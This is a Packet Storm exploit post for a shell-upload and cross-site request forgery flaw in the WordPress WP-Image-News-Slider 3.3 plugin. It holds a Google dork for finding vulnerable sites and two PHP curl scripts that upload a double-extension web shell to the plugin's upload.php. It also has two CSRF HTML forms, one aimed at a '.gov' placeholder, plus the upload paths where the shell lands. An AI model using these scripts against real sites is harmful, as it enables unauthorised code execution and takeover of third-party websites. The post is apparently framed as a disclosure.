what you don't know can hurt you

WordPress WP-Image-News-Slider 3.3 Cross Site Request Forgery / Shell Upload

WordPress WP-Image-News-Slider 3.3 Cross Site Request Forgery / Shell Upload
Posted Mar 5, 2019
Authored by KingSkrupellos

WordPress WP-Image-News-Slider plugin version 3.3 suffers from cross site request forgery and remote shell upload vulnerabilities.

tags | exploit, remote, shell, vulnerability, csrf
MD5 | 565786e871040f0759e592f8d15a7c02

WordPress WP-Image-News-Slider 3.3 Cross Site Request Forgery / Shell Upload

Change Mirror Download
##################################################################################

# Exploit Title : WordPress WP-Image-News-Slider Plugins 3.3 CSRF Shell Upload
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 05/03/2019
# Vendor Homepage : wpslideshow.com
# Software Information Link : wpslideshow.com/newsimage-slider/
# Software Affected Versions : 3.0 ~ 3.1 ~ 3.2 ~ 3.3 ~ 3.5
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/wp-image-news-slider/"
# Vulnerability Type :
CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
CWE-264 [ Permissions, Privileges, and Access Controls ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

##################################################################################

# Description about Software :
***************************
Image News slider is a plugin that allow us to display slideshow on your website.

* Customizable gallery width and gallery height
* Image description
* Customizable Text display panel width
* Customizable auto play time
* Transition Time
* Customizable slide interval
* Customizable scalling

##################################################################################

# Impact :
**********
WordPress WP-Image-News-Slider Plugins 3.3 and other versions is prone to an arbitrary

file upload vulnerability. An attacker may leverage this issue to upload arbitrary files to the

affected computer; this can result in arbitrary code execution within the context of the vulnerable application.

Weaknesses in this category are related to the management of permissions, privileges,

and other security features that are used to perform access control.

##################################################################################

Installation Video from Vendor =>
*******************************
youtube.com/watch?feature=player_embedded&v=DQ-rIX8Akug

== Installation ==

1. Install automatically through the `Plugins`, `Add New` menu in WordPress, or

upload the `wp-image-news-slider` folder to the `/wp-content/plugins/` directory.

2. Activate the plugin through the `Plugins` menu in WordPress. you can find

"Slider" link on left side navigation, click on to configure plugin Options.

##################################################################################

Direct Access Exploit 1 :
***********************
/wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php

Vulnerability Error :
******************
No upload found in $_FILES for Filedata - Security word error.

Note : We have to use CSRF or PHP Exploiter for successfull exploitation.

Exploit 2 :
*********
/wp-admin/admin.php?page=image-news-slider_manage

Vulnerability Error :
******************
WP_Error Object ( [errors] => Array ( [image_no_editor] =>
Array ( [0] => No editor could be selected. ) )
[error_data] => Array ( ) ) Error

# Directory File Path :
********************
/wp-content/uploads/image-news-slider/2_uploadfolder/big/.......

/wp-content/uploads/image-news-slider/30_uploadfolder/big/.....

/wp-content/uploads/image-news-slider/[ID-NUMBER]_uploadfolder/big/.......

/wp-content/plugins/wp-image-news-slider/js/swfupload/......

/wp-content/uploads/.....

##################################################################################

Exploit :
*******

# PHP Backdoor Access / Shell Upload / Arbitrary File Upload Exploiter 1 :
****************************************************************

<?php

$uploadfile="SH3LL.php;.gif";
$ch = curl_init("http://[VULNERABLEWEBSITE]/wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

##################################################################################

# PHP Backdoor Access / Shell Upload / Arbitrary File Upload Exploiter 2 :
****************************************************************
<?php
$uploadfile="SH3LL.php;.gif";
$ch = curl_init("http://[VULNERABLEWEBSITE]/wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://[VULNERABLEWEBSITE]/[PATH]/wp-content/plugins/wp-image-news-slider/js/swfupload/....
<?php
phpinfo();
?>

##################################################################################

Cross Site Request Forgery CSRF Exploiter 1 =>
******************************************
<html>
<body>
<form action="http://www.[VULNERABLESITE].gov/wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="task" value="drm_add_new_album" />
<input type="hidden" name="album_name" value="Arbitrary File Upload for WordPress WP-Image-News-Slider" />
<input type="hidden" name="album_desc" value="Arbitrary File Upload for WordPress WP-Image-News-Slider" />
<input type="file" name="album_img" value="" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

##################################################################################

Cross Site Request Forgery CSRF Exploiter 2 =>
******************************************
<html>
<body>
<form action="http://[VULNERABLEWEBSITE]/wp-admin/admin.php?page=image-news-slider_manage" method="POST" enctype="multipart/form-data">
<input type="hidden" name="task" value="slider_add_new_album" />
<input type="hidden" name="album_name" value="Arbitrary File Upload for WordPress WP-Image-News-Slider" />
<input type="hidden" name="album_desc" value="Arbitrary File Upload for WordPress WP-Image-News-Slider" />
<input type="file" name="album_img" value="" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

##################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

##################################################################################
Login or Register to add favorites

File Archive:

November 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    19 Files
  • 2
    Nov 2nd
    25 Files
  • 3
    Nov 3rd
    8 Files
  • 4
    Nov 4th
    7 Files
  • 5
    Nov 5th
    24 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    0 Files
  • 8
    Nov 8th
    18 Files
  • 9
    Nov 9th
    9 Files
  • 10
    Nov 10th
    106 Files
  • 11
    Nov 11th
    19 Files
  • 12
    Nov 12th
    13 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    18 Files
  • 16
    Nov 16th
    12 Files
  • 17
    Nov 17th
    15 Files
  • 18
    Nov 18th
    12 Files
  • 19
    Nov 19th
    4 Files
  • 20
    Nov 20th
    2 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    22 Files
  • 23
    Nov 23rd
    14 Files
  • 24
    Nov 24th
    19 Files
  • 25
    Nov 25th
    4 Files
  • 26
    Nov 26th
    1 Files
  • 27
    Nov 27th
    4 Files
  • 28
    Nov 28th
    1 Files
  • 29
    Nov 29th
    11 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close